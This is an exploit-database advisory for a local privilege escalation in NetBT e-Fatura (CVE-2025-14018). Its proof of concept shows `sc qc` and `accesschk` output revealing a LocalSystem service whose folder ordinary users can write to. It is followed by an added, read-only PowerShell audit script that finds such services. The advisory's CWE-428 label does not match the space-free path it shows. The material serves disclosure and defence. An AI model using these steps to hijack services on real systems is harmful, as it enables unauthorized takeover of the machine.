## https://sploitus.com/exploit?id=PACKETSTORM:218685
# Exploit Title: NetBT e-Fatura - Privilege Escalation
    # Author: Seccops
    # Discovery Date: 2025-10-03
    # Vendor: https://net-bt.com.tr/e-fatura/
    # Tested Version: 2024
    # Tested on OS: Microsoft Windows Server 2019 DC
    # Vulnerability Type: CWE-428 Unquoted Search Path or Element
    # CVE: CVE-2025-14018
    
    Note: Thanks to "Levent Sungu" for providing the testing environment.
    
    ====================
    Description & Impact
    ====================
    This vulnerability allows an unauthorized local user to execute arbitrary code with high privileges on the system.
    
    ================
    Proof of Concept
    ================
    
    C:\Users\efatura>sc qc InboxProcessor
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: InboxProcessor
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:\inetpub\wwwroot\InboxProcessor\Netbt.Inbox.Process.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : InboxProcessor
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
    
    
    C:\Users\efatura\Desktop>accesschk.exe /accepteula -uwdq "C:\inetpub\wwwroot\InboxProcessor\"
    
    Accesschk v6.15 - Reports effective permissions for securable objects
    Copyright (C) 2006-2022 Mark Russinovich
    Sysinternals - www.sysinternals.com
    
    C:\inetpub\wwwroot\InboxProcessor
      RW BUILTIN\Users
      RW NT SERVICE\TrustedInstaller
      RW NT AUTHORITY\SYSTEM
      RW BUILTIN\Administrators
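
To check a host for the same condition, the audit below (an added example, not part of the original advisory or the vendor's tooling) lists every Windows service whose executable directory grants write access to a broad non-administrative group, the state `accesschk` reports above for `BUILTIN\Users`, and also flags unquoted image paths that contain spaces (CWE-428). The SID table, the write-rights mask and the hypothetical `Get-ServiceExePath` helper are choices made for this example.

```powershell
# Added audit example, not from the advisory. Read-only: it reports, it changes nothing.
# Well-known SIDs of broad, non-administrative groups (locale-independent).
$lowPriv = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-4'      = 'NT AUTHORITY\INTERACTIVE'
    'S-1-5-11'     = 'NT AUTHORITY\Authenticated Users'
    'S-1-5-32-545' = 'BUILTIN\Users'
}
# Rights that allow creating or replacing files in a directory, or rewriting its ACL.
$writeMask = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership'
$inheritOnly = [int][System.Security.AccessControl.PropagationFlags]::InheritOnly
$sidType = [System.Security.Principal.SecurityIdentifier]

# Hypothetical helper: pull the executable path out of a service command line.
function Get-ServiceExePath([string]$PathName) {
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }   # quoted image path
    if ($PathName -match '^\s*(.+?\.exe)') { return $Matches[1] }  # unquoted, up to first .exe
    return $null
}

$findings = foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    $exe = Get-ServiceExePath $svc.PathName
    if (-not $exe) { continue }
    $dir = Split-Path -Path $exe -Parent
    if (-not $dir) { continue }
    $acl = Get-Acl -LiteralPath $dir -ErrorAction SilentlyContinue
    if (-not $acl) { continue }   # directory missing or ACL not readable

    # Allow ACEs that apply to the directory itself and grant a write-type right.
    $writers = $acl.GetAccessRules($true, $true, $sidType) | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $lowPriv.ContainsKey($_.IdentityReference.Value) -and
        (([int]$_.PropagationFlags -band $inheritOnly) -eq 0) -and
        (([int]$_.FileSystemRights -band $writeMask) -ne 0)
    } | ForEach-Object { $lowPriv[$_.IdentityReference.Value] } | Sort-Object -Unique

    # CWE-428 condition: image path not quoted and containing whitespace.
    $unquoted = ($svc.PathName -notmatch '^\s*"') -and ($exe -match '\s')

    if ($writers -or $unquoted) {
        [pscustomobject]@{
            Service      = $svc.Name
            RunsAs       = $svc.StartName
            Directory    = $dir
            WritableBy   = $writers -join ', '
            UnquotedPath = $unquoted
        }
    }
}
$findings | Sort-Object Service | Format-Table -AutoSize -Wrap
```

Run it from an elevated prompt so every directory ACL is readable. For a flagged service, the usual remediation is to remove the write ACE for the listed group from the directory and to quote the service's image path.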